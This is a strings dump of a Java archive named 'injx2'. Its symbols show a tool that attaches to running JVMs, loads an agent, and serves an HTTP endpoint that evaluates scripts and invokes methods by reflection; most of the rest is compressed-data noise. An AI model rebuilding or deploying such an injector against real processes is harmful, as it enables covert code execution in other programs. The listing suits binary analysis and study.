#com/sun/net/httpserver/HttpExchange 00000000DA52 00000000DA52 0 java/io/InputStream 00000000DA68 00000000DA68 0 java/util/regex/Pattern 00000000DA82 00000000DA82 0 java/util/regex/Matcher 00000000DA9C 00000000DA9C 0 java/util/Iterator 00000000DAB1 00000000DAB1 0 java/io/IOException 00000000DAC7 00000000DAC7 0 getClassLoader 00000000DAD8 00000000DAD8 0 ()Ljava/lang/ClassLoader; 00000000DAF4 00000000DAF4 0 (Ljava/lang/ClassLoader;)V 00000000DB11 00000000DB11 0 getEngineByExtension 00000000DB27 00000000DB27 0 /(Ljava/lang/String;)Ljavax/script/ScriptEngine; 00000000DB5A 00000000DB5A 0 (Ljava/io/Writer;)V 00000000DB70 00000000DB70 0 getContext 00000000DB7D 00000000DB7D 0 ()Ljavax/script/ScriptContext; 00000000DB9E 00000000DB9E 0 javax/script/ScriptContext 00000000DBBA 00000000DBBA 0 setWriter 00000000DBC7 00000000DBC7 0 setErrorWriter 00000000DBDE 00000000DBDE 0 &(Ljava/lang/String;)Ljava/lang/Object; 00000000DC08 00000000DC08 0 printStackTrace 00000000DC1A 00000000DC1A 0 (Ljava/io/PrintWriter;)V 00000000DC34 00000000DC34 0 getBuffer 00000000DC41 00000000DC41 0 ()Ljava/lang/StringBuffer; 00000000DC5E 00000000DC5E 0 java/lang/StringBuffer 00000000DC77 00000000DC77 0 toString 00000000DC82 00000000DC82 0 ()Ljava/lang/String; 00000000DC99 00000000DC99 0 getRequestMethod 00000000DCAC 00000000DCAC 0 getRequestURI 00000000DCBC 00000000DCBC 0 ()Ljava/net/URI; File pos Mem pos ID Text ======== ======= == ==== 00000000DCCF 00000000DCCF 0 java/net/URI 00000000DCDE 00000000DCDE 0 getPath 00000000DCE8 00000000DCE8 0 equals 00000000DCF1 00000000DCF1 0 (Ljava/lang/Object;)Z 00000000DD09 00000000DD09 0 injx2/Global 00000000DD18 00000000DD18 0 checklog 00000000DD23 00000000DD23 0 getRequestBody 00000000DD34 00000000DD34 0 ()Ljava/io/InputStream; 00000000DD4E 00000000DD4E 0 (Ljava/io/InputStream;)V 00000000DD69 00000000DD69 0 (Ljava/io/Reader;)V 00000000DD7F 00000000DD7F 0 readLine 00000000DD8A 00000000DD8A 0 append 00000000DD92 00000000DD92 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000DDC3 00000000DDC3 0 java/net/URLDecoder 00000000DDD9 00000000DDD9 0 decode 00000000DDE9 00000000DDE9 0 Ljava/io/BufferedWriter; 00000000DE04 00000000DE04 0 java/io/BufferedWriter 00000000DE1D 00000000DE1D 0 write 00000000DE25 00000000DE25 0 (Ljava/lang/String;)V 00000000DE3D 00000000DE3D 0 flush 00000000DE45 00000000DE45 0 compile 00000000DE4E 00000000DE4E 0 -(Ljava/lang/String;)Ljava/util/regex/Pattern; 00000000DE7F 00000000DE7F 0 matcher 00000000DE88 00000000DE88 0 3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher; 00000000DECC 00000000DECC 0 group 00000000DED4 00000000DED4 0 (I)Ljava/lang/String; 00000000DEEC 00000000DEEC 0 replaceAll 00000000DEF8 00000000DEF8 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000DF33 00000000DF33 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 00000000DF78 00000000DF78 0 start 00000000DF80 00000000DF80 0 getQuery 00000000DF8B 00000000DF8B 0 split 00000000DF92 00000000DF92 0 '(Ljava/lang/String;)[Ljava/lang/String; 00000000DFBD 00000000DFBD 0 runningclass 00000000DFCC 00000000DFCC 0 Ljava/util/Map; 00000000DFDE 00000000DFDE 0 java/util/Map 00000000DFF3 00000000DFF3 0 &(Ljava/lang/Object;)Ljava/lang/Object; 00000000E01D 00000000E01D 0 getDeclaredMethods 00000000E032 00000000E032 0 ()[Ljava/lang/reflect/Method; 00000000E052 00000000E052 0 java/lang/reflect/Method 00000000E06D 00000000E06D 0 getParameterTypes 00000000E081 00000000E081 0 ()[Ljava/lang/Class; 00000000E098 00000000E098 0 getName 00000000E0A2 00000000E0A2 0 getBytes 00000000E0B3 00000000E0B3 0 javax/xml/bind/DatatypeConverter 00000000E0D7 00000000E0D7 0 printBase64Binary 00000000E0EB 00000000E0EB 0 ([B)Ljava/lang/String; 00000000E104 00000000E104 0 parseBase64Binary 00000000E118 00000000E118 0 (Ljava/lang/String;)[B 00000000E131 00000000E131 0 ([B)V 00000000E138 00000000E138 0 -(Ljava/lang/Object;)Ljava/lang/StringBuilder; 00000000E169 00000000E169 0 java/lang/Integer 00000000E17D 00000000E17D 0 parseInt 00000000E188 00000000E188 0 (Ljava/lang/String;)I 00000000E1A0 00000000E1A0 0 isArray 00000000E1B1 00000000E1B1 0 isAccessible 00000000E1C0 00000000E1C0 0 setAccessible 00000000E1D7 00000000E1D7 0 invoke 00000000E1DF 00000000E1DF 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 00000000E21C 00000000E21C 0 keySet File pos Mem pos ID Text ======== ======= == ==== 00000000E225 00000000E225 0 ()Ljava/util/Set; 00000000E239 00000000E239 0 java/util/Set 00000000E249 00000000E249 0 iterator 00000000E254 00000000E254 0 ()Ljava/util/Iterator; 00000000E26D 00000000E26D 0 hasNext 00000000E27E 00000000E27E 0 ()Ljava/lang/Object; 00000000E294 00000000E294 0 insertjar 00000000E2A0 00000000E2A0 0 loadClass 00000000E2AC 00000000E2AC 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000E2D5 00000000E2D5 0 newInstance 00000000E2E3 00000000E2E3 0 getMethods 00000000E2EF 00000000E2EF 0 substring 00000000E2FC 00000000E2FC 0 (II)Ljava/lang/String; 00000000E315 00000000E315 0 java/lang/System 00000000E328 00000000E328 0 getProperty 00000000E336 00000000E336 0 toLowerCase 00000000E344 00000000E344 0 contains 00000000E34F 00000000E34F 0 (Ljava/lang/CharSequence;)Z 00000000E36D 00000000E36D 0 getResponseHeaders 00000000E381 00000000E381 0 "()Lcom/sun/net/httpserver/Headers; 00000000E3A7 00000000E3A7 0 com/sun/net/httpserver/Headers 00000000E3CD 00000000E3CD 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000E3F8 00000000E3F8 0 length 00000000E407 00000000E407 0 sendResponseHeaders 00000000E41D 00000000E41D 0 (IJ)V 00000000E425 00000000E425 0 getResponseBody 00000000E437 00000000E437 0 ()Ljava/io/OutputStream; 00000000E452 00000000E452 0 java/io/OutputStream 00000000E469 00000000E469 0 close 00000000F964 00000000F964 0 injx2/HTTPServ.class 00000000F9C5 00000000F9C5 0 MyHandler 00000000F9D2 00000000F9D2 0 InnerClasses 00000000F9E1 00000000F9E1 0 <init> 00000000F9F7 00000000F9F7 0 LineNumberTable 00000000FA09 00000000FA09 0 LocalVariableTable 00000000FA25 00000000FA25 0 Linjx2/HTTPServ; 00000000FA44 00000000FA44 0 value 00000000FA50 00000000FA50 0 server 00000000FA58 00000000FA58 0 #Lcom/sun/net/httpserver/HttpServer; 00000000FA7F 00000000FA7F 0 Exceptions 00000000FA8F 00000000FA8F 0 SourceFile 00000000FA9C 00000000FA9C 0 HTTPServ.java 00000000FAB1 00000000FAB1 0 java/net/InetSocketAddress 00000000FAEC 00000000FAEC 0 injx2/HTTPServ$MyHandler 00000000FB1E 00000000FB1E 0 injx2/HTTPServ 00000000FB2F 00000000FB2F 0 java/lang/Object 00000000FB42 00000000FB42 0 java/io/IOException 00000000FB58 00000000FB58 0 java/lang/Integer 00000000FB6C 00000000FB6C 0 valueOf 00000000FB76 00000000FB76 0 (I)Ljava/lang/Integer; 00000000FB8F 00000000FB8F 0 intValue 00000000FB9F 00000000FB9F 0 !com/sun/net/httpserver/HttpServer 00000000FBC4 00000000FBC4 0 create 00000000FBCC 00000000FBCC 0 B(Ljava/net/InetSocketAddress;I)Lcom/sun/net/httpserver/HttpServer; 00000000FC12 00000000FC12 0 createContext 00000000FC21 00000000FC21 0 \(Ljava/lang/String;Lcom/sun/net/httpserver/HttpHandler;)Lcom/sun/net/httpserver/HttpContext; 00000000FC81 00000000FC81 0 java/util/concurrent/Executors 00000000FCA2 00000000FCA2 0 newCachedThreadPool 00000000FCB7 00000000FCB7 0 (()Ljava/util/concurrent/ExecutorService; 00000000FCE3 00000000FCE3 0 setExecutor File pos Mem pos ID Text ======== ======= == ==== 00000000FCF0 00000000FCF0 0 "(Ljava/util/concurrent/Executor;)V 00000000FD16 00000000FD16 0 start 00000000FE29 00000000FE29 0 injx2/INJX.class 000000010014 000000010014 0 Ljava/io/File; 000000010025 000000010025 0 <init> 00000001003B 00000001003B 0 LineNumberTable 00000001004D 00000001004D 0 LocalVariableTable 000000010069 000000010069 0 Linjx2/INJX; 000000010078 000000010078 0 getProcessNameFromPhl 000000010097 000000010097 0 &(Ljava/lang/String;)Ljava/lang/String; 0000000100C5 0000000100C5 0 Ljava/io/IOException; 0000000100E1 0000000100E1 0 Ljava/lang/InterruptedException; 000000010109 000000010109 0 Ljava/lang/Process; 00000001011F 00000001011F 0 sbInput 000000010129 000000010129 0 Ljava/lang/StringBuffer; 000000010144 000000010144 0 brInput 00000001014E 00000001014E 0 Ljava/io/BufferedReader; 000000010170 000000010170 0 Ljava/lang/String; 000000010184 000000010184 0 foundLine 000000010191 000000010191 0 result 00000001019F 00000001019F 0 Ljava/io/FileNotFoundException; 0000000101CD 0000000101CD 0 Ljava/lang/StringBuilder; 0000000101EF 0000000101EF 0 StackMapTable 00000001021A 00000001021A 0 getpid 000000010229 000000010229 0 runtime 000000010232 000000010232 0 $Ljava/lang/management/RuntimeMXBean; 000000010260 000000010260 0 Ljava/lang/reflect/Field; 000000010283 000000010283 0 Lsun/management/VMManagement; 0000000102A3 0000000102A3 0 pid_method 0000000102B0 0000000102B0 0 Ljava/lang/reflect/Method; 0000000102CC 0000000102CC 0 Ljava/lang/NoSuchFieldException; 0000000102F0 0000000102F0 0 Ljava/lang/SecurityException; 00000001030F 00000001030F 0 $Ljava/lang/IllegalArgumentException; 000000010336 000000010336 0 "Ljava/lang/IllegalAccessException; 00000001035B 00000001035B 0 !Ljava/lang/NoSuchMethodException; 00000001037F 00000001037F 0 -Ljava/lang/reflect/InvocationTargetException; 0000000103C9 0000000103C9 0 ([Ljava/lang/String;)V 0000000103E2 0000000103E2 0 descriptor 0000000103EE 0000000103EE 0 /Lcom/sun/tools/attach/VirtualMachineDescriptor; 000000010426 000000010426 0 Ljava/util/Iterator; 00000001043D 00000001043D 0 descriptors 00000001044B 00000001044B 0 Ljava/util/List; 00000001045D 00000001045D 0 2Lcom/sun/tools/attach/AttachNotSupportedException; 000000010492 000000010492 0 )Lcom/sun/tools/attach/AgentLoadException; 0000000104BE 0000000104BE 0 3Lcom/sun/tools/attach/AgentInitializationException; 0000000104F5 0000000104F5 0 Ljava/net/URISyntaxException; 000000010519 000000010519 0 %Lcom/sun/tools/attach/VirtualMachine; 000000010549 000000010549 0 [Ljava/lang/String; 00000001055F 00000001055F 0 LocalVariableTypeTable 000000010577 000000010577 0 ALjava/util/List<Lcom/sun/tools/attach/VirtualMachineDescriptor;>; 0000000105E1 0000000105E1 0 SourceFile 0000000105ED 0000000105ED 0 INJX.java 000000010604 000000010604 0 os.name 000000010631 000000010631 0 tasklist 000000010641 000000010641 0 java/io/IOException 00000001065C 00000001065C 0 java/lang/StringBuffer 000000010675 000000010675 0 java/io/BufferedReader 00000001068E 00000001068E 0 java/io/InputStreamReader 0000000106BC 0000000106BC 0 UNKNOWN 0000000106CB 0000000106CB 0 java/lang/StringBuilder File pos Mem pos ID Text ======== ======= == ==== 0000000106F8 0000000106F8 0 injx2/INJX 000000010724 000000010724 0 java/lang/InterruptedException 000000010758 000000010758 0 java/io/File 000000010767 000000010767 0 /proc/ 000000010770 000000010770 0 /psline 000000010784 000000010784 0 /cmdline 00000001078F 00000001078F 0 java/io/FileReader 0000000107A9 0000000107A9 0 java/io/FileNotFoundException 0000000107D3 0000000107D3 0 Known 0000000107FA 0000000107FA 0 sun/management/VMManagement 000000010818 000000010818 0 getProcessId 000000010827 000000010827 0 java/lang/Class 000000010841 000000010841 0 java/lang/Object 000000010859 000000010859 0 java/lang/Integer 000000010872 000000010872 0 java/lang/NoSuchFieldException 000000010893 000000010893 0 java/lang/SecurityException 0000000108B0 0000000108B0 0 "java/lang/IllegalArgumentException 0000000108D5 0000000108D5 0 java/lang/IllegalAccessException 0000000108F9 0000000108F9 0 java/lang/NoSuchMethodException 00000001091A 00000001091A 0 +java/lang/reflect/InvocationTargetException 000000010955 000000010955 0 +----------------- JVMs:------------------- 0000000109A0 0000000109A0 0 -com/sun/tools/attach/VirtualMachineDescriptor 0000000109EB 0000000109EB 0 *----------------------------------------- 000000010A2A 000000010A2A 0 0com/sun/tools/attach/AttachNotSupportedException 000000010A6E 000000010A6E 0 Loading: 000000010ACB 000000010ACB 0 Liberdade e gl 000000010ADF 000000010ADF 0 Libertad y gloria 000000010B25 000000010B25 0 'com/sun/tools/attach/AgentLoadException 000000010B4F 000000010B4F 0 1com/sun/tools/attach/AgentInitializationException 000000010B84 000000010B84 0 java/net/URISyntaxException 000000010BA7 000000010BA7 0 java/lang/String 000000010BBA 000000010BBA 0 java/lang/Process 000000010BCE 000000010BCE 0 java/util/List 000000010BDF 000000010BDF 0 java/util/Iterator 000000010BF3 000000010BF3 0 #com/sun/tools/attach/VirtualMachine 000000010C1A 000000010C1A 0 java/lang/Throwable 000000010C30 000000010C30 0 java/lang/System 000000010C43 000000010C43 0 getProperty 000000010C51 000000010C51 0 toLowerCase 000000010C5F 000000010C5F 0 ()Ljava/lang/String; 000000010C76 000000010C76 0 contains 000000010C81 000000010C81 0 (Ljava/lang/CharSequence;)Z 000000010C9F 000000010C9F 0 java/lang/Runtime 000000010CB3 000000010CB3 0 getRuntime 000000010CC0 000000010CC0 0 ()Ljava/lang/Runtime; 000000010CDE 000000010CDE 0 '(Ljava/lang/String;)Ljava/lang/Process; 000000010D09 000000010D09 0 printStackTrace 000000010D1B 000000010D1B 0 getInputStream 000000010D2C 000000010D2C 0 ()Ljava/io/InputStream; 000000010D46 000000010D46 0 (Ljava/io/InputStream;)V 000000010D61 000000010D61 0 (Ljava/io/Reader;)V 000000010D77 000000010D77 0 readLine 000000010D82 000000010D82 0 append 000000010D8A 000000010D8A 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000010DBB 000000010DBB 0 toString 000000010DC5 000000010DC5 0 ,(Ljava/lang/String;)Ljava/lang/StringBuffer; 000000010DF5 000000010DF5 0 getName 000000010DFF 000000010DFF 0 java/util/logging/Logger 000000010E19 000000010E19 0 getLogger 000000010E25 000000010E25 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; File pos Mem pos ID Text ======== ======= == ==== 000000010E57 000000010E57 0 java/util/logging/Level 000000010E71 000000010E71 0 SEVERE 000000010E7A 000000010E7A 0 Ljava/util/logging/Level; 000000010E9B 000000010E9B 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 000000010EE2 000000010EE2 0 waitFor 000000010EEC 000000010EEC 0 destroy 000000010EF6 000000010EF6 0 indexOf 000000010F00 000000010F00 0 (Ljava/lang/String;)I 000000010F17 000000010F17 0 substring 000000010F24 000000010F24 0 (II)Ljava/lang/String; 000000010F3D 000000010F3D 0 (Ljava/lang/String;)V 000000010F55 000000010F55 0 exists 000000010F64 000000010F64 0 (Ljava/io/File;)V 000000010F78 000000010F78 0 replaceAll 000000010F84 000000010F84 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 000000010FBF 000000010FBF 0 &java/lang/management/ManagementFactory 000000010FE9 000000010FE9 0 getRuntimeMXBean 000000010FFB 000000010FFB 0 &()Ljava/lang/management/RuntimeMXBean; 000000011025 000000011025 0 getClass 000000011030 000000011030 0 ()Ljava/lang/Class; 000000011046 000000011046 0 getDeclaredField 000000011058 000000011058 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 000000011089 000000011089 0 java/lang/reflect/Field 0000000110A3 0000000110A3 0 setAccessible 0000000110BF 0000000110BF 0 &(Ljava/lang/Object;)Ljava/lang/Object; 0000000110E9 0000000110E9 0 getDeclaredMethod 0000000110FC 0000000110FC 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 000000011140 000000011140 0 java/lang/reflect/Method 00000001115B 00000001115B 0 invoke 000000011163 000000011163 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 0000000111A0 0000000111A0 0 intValue 0000000111B2 0000000111B2 0 ()Ljava/util/List; 0000000111CD 0000000111CD 0 Ljava/io/PrintStream; 0000000111E5 0000000111E5 0 java/io/PrintStream 0000000111FB 0000000111FB 0 println 000000011205 000000011205 0 iterator 000000011210 000000011210 0 ()Ljava/util/Iterator; 000000011229 000000011229 0 hasNext 00000001123A 00000001123A 0 ()Ljava/lang/Object; 000000011256 000000011256 0 displayName 000000011264 000000011264 0 matches 00000001126E 00000001126E 0 (Ljava/lang/String;)Z 000000011286 000000011286 0 attach 00000001128E 00000001128E 0 9(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine; 0000000112CB 0000000112CB 0 parseInt 0000000112D6 0000000112D6 0 getProtectionDomain 0000000112EB 0000000112EB 0 "()Ljava/security/ProtectionDomain; 000000011311 000000011311 0 java/security/ProtectionDomain 000000011332 000000011332 0 getCodeSource 000000011342 000000011342 0 ()Ljava/security/CodeSource; 000000011361 000000011361 0 java/security/CodeSource 00000001137C 00000001137C 0 getLocation 00000001138A 00000001138A 0 ()Ljava/net/URL; 00000001139D 00000001139D 0 java/net/URL 0000000113AC 0000000113AC 0 toURI 0000000113B4 0000000113B4 0 ()Ljava/net/URI; 0000000113C7 0000000113C7 0 java/net/URI 0000000113D6 0000000113D6 0 getPath 0000000113E0 0000000113E0 0 getAbsolutePath 0000000113F1 0000000113F1 0 loadAgent File pos Mem pos ID Text ======== ======= == ==== 0000000113FD 0000000113FD 0 '(Ljava/lang/String;Ljava/lang/String;)V 000000011428 000000011428 0 detach 000000011FD0 000000011FD0 0 injx2/ViewClassLoader.class 000000012059 000000012059 0 <init> 00000001206F 00000001206F 0 LineNumberTable 000000012081 000000012081 0 LocalVariableTable 00000001209D 00000001209D 0 Linjx2/ViewClassLoader; 0000000120B6 0000000120B6 0 loadClass 0000000120C2 0000000120C2 0 &(Ljava/lang/String;Z)Ljava/lang/Class; 0000000120FC 0000000120FC 0 Ljava/io/IOException; 000000012114 000000012114 0 filename 00000001211F 00000001211F 0 Ljava/lang/String; 000000012134 000000012134 0 Ljava/lang/Exception; 000000012153 000000012153 0 resolve 000000012165 000000012165 0 Ljava/lang/Class; 000000012179 000000012179 0 StackMapTable 000000012195 000000012195 0 Exceptions 0000000121A2 0000000121A2 0 loadClassData 0000000121B2 0000000121B2 0 (Ljava/lang/String;)[B 0000000121CB 0000000121CB 0 classbytes 0000000121D8 0000000121D8 0 SourceFile 0000000121E5 0000000121E5 0 ViewClassLoader.java 000000012206 000000012206 0 java/lang/StringBuilder 000000012235 000000012235 0 .class 00000001224C 00000001224C 0 java/lang/ClassNotFoundException 000000012275 000000012275 0 java/io/IOException 00000001228B 00000001228B 0 Error reading file: 0000000122A7 0000000122A7 0 java/lang/Exception 0000000122D2 0000000122D2 0 injx2/ViewClassLoader 0000000122EA 0000000122EA 0 java/lang/ClassLoader 000000012302 000000012302 0 java/lang/Class 000000012314 000000012314 0 java/lang/String 000000012327 000000012327 0 findLoadedClass 000000012338 000000012338 0 %(Ljava/lang/String;)Ljava/lang/Class; 000000012361 000000012361 0 java/io/File 000000012370 000000012370 0 separatorChar 000000012384 000000012384 0 replace 00000001238E 00000001238E 0 (CC)Ljava/lang/String; 0000000123A7 0000000123A7 0 append 0000000123AF 0000000123AF 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 0000000123E0 0000000123E0 0 toString 0000000123EB 0000000123EB 0 ()Ljava/lang/String; 000000012402 000000012402 0 defineClass 00000001240F 00000001240F 0 )(Ljava/lang/String;[BII)Ljava/lang/Class; 00000001243C 00000001243C 0 (Ljava/lang/String;)V 000000012454 000000012454 0 findSystemClass 000000012466 000000012466 0 resolveClass 000000012475 000000012475 0 (Ljava/lang/Class;)V 00000001248C 00000001248C 0 injx2/Global 00000001249B 00000001249B 0 classmap 0000000124A6 0000000124A6 0 Ljava/util/Map; 0000000124B8 0000000124B8 0 java/util/Map 0000000124CD 0000000124CD 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000012757 000000012757 0 injx2/javassist/UT 000000012771 000000012771 0 #z\ux 0000000127A1 0000000127A1 0 injx2/javassist/bytecode/UT 0000000127C4 0000000127C4 0 #z\ux 0000000127F4 0000000127F4 0 com/UT 000000012802 000000012802 0 %z\ux 000000012832 000000012832 0 com/sun/UT File pos Mem pos ID Text ======== ======= == ==== 000000012844 000000012844 0 %z\ux 000000012874 000000012874 0 com/sun/tools/UT 00000001288C 00000001288C 0 %z\ux 0000000128BC 0000000128BC 0 com/sun/tools/attach/UT 0000000128DB 0000000128DB 0 %z\ux 00000001290B 00000001290B 0 com/sun/tools/attach/AttachPermission.classUT 000000012940 000000012940 0 %z\ux 000000012960 000000012960 0 A,bDc 000000012B9B 000000012B9B 0 com/sun/tools/attach/AttachNotSupportedException.classUT 000000012BDB 000000012BDB 0 %z\ux 000000012C51 000000012C51 0 ]34&J 000000012C5A 000000012C5A 0 I{#f1 000000012D27 000000012D27 0 com/sun/tools/attach/AgentLoadException.classUT 000000012D5E 000000012D5E 0 %z\ux 000000012DD6 000000012DD6 0 P*qSL 000000012E19 000000012E19 0 ,'~wun5 000000012EA5 000000012EA5 0 com/sun/tools/attach/AgentInitializationException.classUT 000000012EE6 000000012EE6 0 %z\ux 000000012F07 000000012F07 0 G PPp 000000013054 000000013054 0 K" c= 000000013085 000000013085 0 com/sun/tools/attach/spi/UT 0000000130A8 0000000130A8 0 %z\ux 0000000130D8 0000000130D8 0 sun/UT 0000000130E6 0000000130E6 0 %z\ux 000000013116 000000013116 0 sun/tools/UT 00000001312A 00000001312A 0 %z\ux 00000001315A 00000001315A 0 sun/jvmstat/UT 000000013170 000000013170 0 %z\ux 0000000131A0 0000000131A0 0 sun/tools/attach/UT 0000000131BB 0000000131BB 0 ?z\ux 0000000131EB 0000000131EB 0 sun/tools/attach/WindowsVirtualMachine.classUT 000000013221 000000013221 0 %z\ux 000000013250 000000013250 0 | (Bm 000000013378 000000013378 0 Q}Z<. 0000000133D2 0000000133D2 0 q4'A 0000000133D8 0000000133D8 0 FE*iY 00000001341D 00000001341D 0 fY&QP 000000013475 000000013475 0 TIoR; 000000013555 000000013555 0 U4"OE 00000001355E 00000001355E 0 ,v!_E 000000013610 000000013610 0 E.rhm 00000001363D 00000001363D 0 ;N$qo 0000000137B1 0000000137B1 0 'ihTWhh2Wh 000000013835 000000013835 0 sun/tools/attach/WindowsAttachProvider.classUT 00000001386B 00000001386B 0 %z\ux 0000000138A9 0000000138A9 0 YgfAl 000000013973 000000013973 0 PGLrS 0000000139CB 0000000139CB 0 6SR+r/9 000000013C15 000000013C15 0 w8<|/; 000000013DD4 000000013DD4 0 q+pv 000000013E13 000000013E13 0 Jy~R| 000000013EE6 000000013EE6 0 _u15p 000000013F1C 000000013F1C 0 uA!&q 000000013FDB 000000013FDB 0 sun/tools/attach/HotSpotVirtualMachine.classUT 000000014011 000000014011 0 %z\ux 000000014167 000000014167 0 v3Ivu 0000000141DE 0000000141DE 0 h [x\ 000000014210 000000014210 0 I'mCz~ 000000014282 000000014282 0 Rs);\ 00000001428B 00000001428B 0 ;55S@G File pos Mem pos ID Text ======== ======= == ==== 000000014314 000000014314 0 ,CMuX 000000014365 000000014365 0 GfY,N}he 000000014379 000000014379 0 }BMmg 0000000143FD 0000000143FD 0 S2ZdDd 000000014415 000000014415 0 +#.cH 000000014477 000000014477 0 a]8X> 000000014486 000000014486 0 ,o2PF 00000001454F 00000001454F 0 x5Tb1 000000014944 000000014944 0 sun/tools/attach/WindowsVirtualMachine$PipedInputStream.classUT 00000001498B 00000001498B 0 1z\ux 000000014B05 000000014B05 0 1JY9zQ! 000000014B3B 000000014B3B 0 hbFEyr 000000014C0A 000000014C0A 0 sun/jvmstat/monitor/UT 000000014C28 000000014C28 0 %z\ux 000000014C58 000000014C58 0 sun/jvmstat/perfdata/UT 000000014C77 000000014C77 0 %z\ux 000000014CA7 000000014CA7 0 sun/jvmstat/monitor/remote/UT 000000014CCC 000000014CCC 0 %z\ux 000000014CFC 000000014CFC 0 sun/jvmstat/perfdata/monitor/UT 000000014D23 000000014D23 0 %z\ux 000000014D53 000000014D53 0 sun/jvmstat/perfdata/monitor/protocol/UT 000000014D83 000000014D83 0 %z\ux 000000014DB3 000000014DB3 0 sun/jvmstat/perfdata/monitor/v2_0/UT 000000014DDF 000000014DDF 0 %z\ux 000000014E0F 000000014E0F 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBuffer.classUT 000000014E4F 000000014E4F 0 %z\ux 000000014F84 000000014F84 0 +UlQq 0000000150B2 0000000150B2 0 A5sN5sr 0000000150E7 0000000150E7 0 &VA*u 00000001513D 00000001513D 0 uuCRk 000000015163 000000015163 0 7x}kZ= 00000001518C 00000001518C 0 jz%IVKC 00000001522D 00000001522D 0 THbj@ 0000000152CD 0000000152CD 0 Q<)Vr e 00000001535A 00000001535A 0 5\@QH 000000015392 000000015392 0 S]uu' 0000000153B4 0000000153B4 0 bw$LVq 0000000153E9 0000000153E9 0 75 zx 00000001540A 00000001540A 0 ?Eit6 0000000154FE 0000000154FE 0 1Lb( 000000015607 000000015607 0 _PHgN 00000001562D 00000001562D 0 Io8aIU 00000001565A 00000001565A 0 B0[d', 00000001581D 00000001581D 0 3t0t2 000000015C44 000000015C44 0 f%YTcN 000000015C57 000000015C57 0 /!l-/ 000000015D76 000000015D76 0 !;%=dy 000000015E78 000000015E78 0 oa{N!n 000000015FB4 000000015FB4 0 sun/jvmstat/perfdata/monitor/protocol/local/UT 000000015FEA 000000015FEA 0 %z\ux 00000001601A 00000001601A 0 META-INF/services/UT 000000016036 000000016036 0 %z\ux 000000016066 000000016066 0 META-INF/services/com.sun.tools.attach.spi.AttachProviderUT 0000000160A9 0000000160A9 0 %z\ux 0000000160D9 0000000160D9 0 4W.wr 000000016120 000000016120 0 Y2gj" 000000016213 000000016213 0 META-INF/services/com.sun.tools.internal.xjc.PluginUT 000000016250 000000016250 0 %z\ux 0000000162EE 0000000162EE 0 META-INF/services/com.sun.mirror.apt.AnnotationProcessorFactoryUT 000000016337 000000016337 0 %z\ux File pos Mem pos ID Text ======== ======= == ==== 000000016349 000000016349 0 com.sun.istack.internal.ws.AnnotationProcessorFactoryImpl 00000001638E 00000001638E 0 rzB#n 0000000163A1 0000000163A1 0 META-INF/services/com.sun.jdi.connect.spi.TransportServiceUT 0000000163E5 0000000163E5 0 %z\ux 000000016403 000000016403 0 B (hR 000000016531 000000016531 0 META-INF/services/com.sun.jdi.connect.ConnectorUT 00000001656A 00000001656A 0 %z\ux 00000001658E 00000001658E 0 !V(DSRED| 0000000165AD 0000000165AD 0 eO&pz2 0000000165C6 0000000165C6 0 p}uu} 000000016708 000000016708 0 injx2/javassist/NotFoundException.classUT 000000016739 000000016739 0 #z\ux 0000000167C5 0000000167C5 0 =IXn(K6 00000001685D 00000001685D 0 @SW<[ 000000016884 000000016884 0 "G3@71 0000000168B4 0000000168B4 0 6F<Dd 0000000168DC 0000000168DC 0 bNC7V7 0000000168EE 0000000168EE 0 injx2/javassist/JarClassPath.classUT 00000001691A 00000001691A 0 #z\ux 000000016AD3 000000016AD3 0 hrgcB 000000016B85 000000016B85 0 *.Im"Cv 000000016D05 000000016D05 0 'I+DT 000000016DE1 000000016DE1 0 0?y!T 000000016E13 000000016E13 0 injx2/javassist/DirClassPath.classUT 000000016E3F 000000016E3F 0 #z\ux 000000016EE9 000000016EE9 0 7:6t|+ 000000017159 000000017159 0 s\d62 000000017186 000000017186 0 2jw[E 00000001722D 00000001722D 0 /q<9] 000000017272 000000017272 0 injx2/javassist/CtPrimitiveType.classUT 0000000172A1 0000000172A1 0 #z\ux 000000017496 000000017496 0 "nL*]( 0000000174E5 0000000174E5 0 I)R]! 0000000174EB 0000000174EB 0 J5C3$ 00000001758C 00000001758C 0 injx2/javassist/CtMethod.classUT 0000000175B4 0000000175B4 0 #z\ux 0000000175C7 0000000175C7 0 X x\U 0000000176A5 0000000176A5 0 dV6Fe 0000000176F3 0000000176F3 0 5l;vZ 000000017750 000000017750 0 h2fwl 0000000177AC 0000000177AC 0 f)JgW 00000001786F 00000001786F 0 Y&7k, 0000000179BF 0000000179BF 0 xRf{0 000000017A11 000000017A11 0 y4F)CU 000000017B7F 000000017B7F 0 $YZjNis# 000000017E79 000000017E79 0 :Y=Lt 000000018000 000000018000 0 injx2/javassist/CtMember$Cache.classUT 00000001802E 00000001802E 0 #z\ux 000000018206 000000018206 0 L#ju_TP 000000018273 000000018273 0 up=TC 000000018353 000000018353 0 Ql'%[ 000000018362 000000018362 0 W[8>o 000000018529 000000018529 0 h$Lv+ 00000001854D 00000001854D 0 9/zU!'J 0000000185DE 0000000185DE 0 injx2/javassist/CtMember.classUT 000000018606 000000018606 0 #z\ux 000000018621 000000018621 0 L:i:mi 000000018656 000000018656 0 P\|e- 00000001871D 00000001871D 0 f*K$6 00000001874B 00000001874B 0 sG< B File pos Mem pos ID Text ======== ======= == ==== 00000001875F 00000001875F 0 ccVNa 0000000187B0 0000000187B0 0 G<3}a 0000000187F7 0000000187F7 0 ikZtX 00000001880C 00000001880C 0 gL;+A- 000000018896 000000018896 0 'zN$j~ 000000018968 000000018968 0 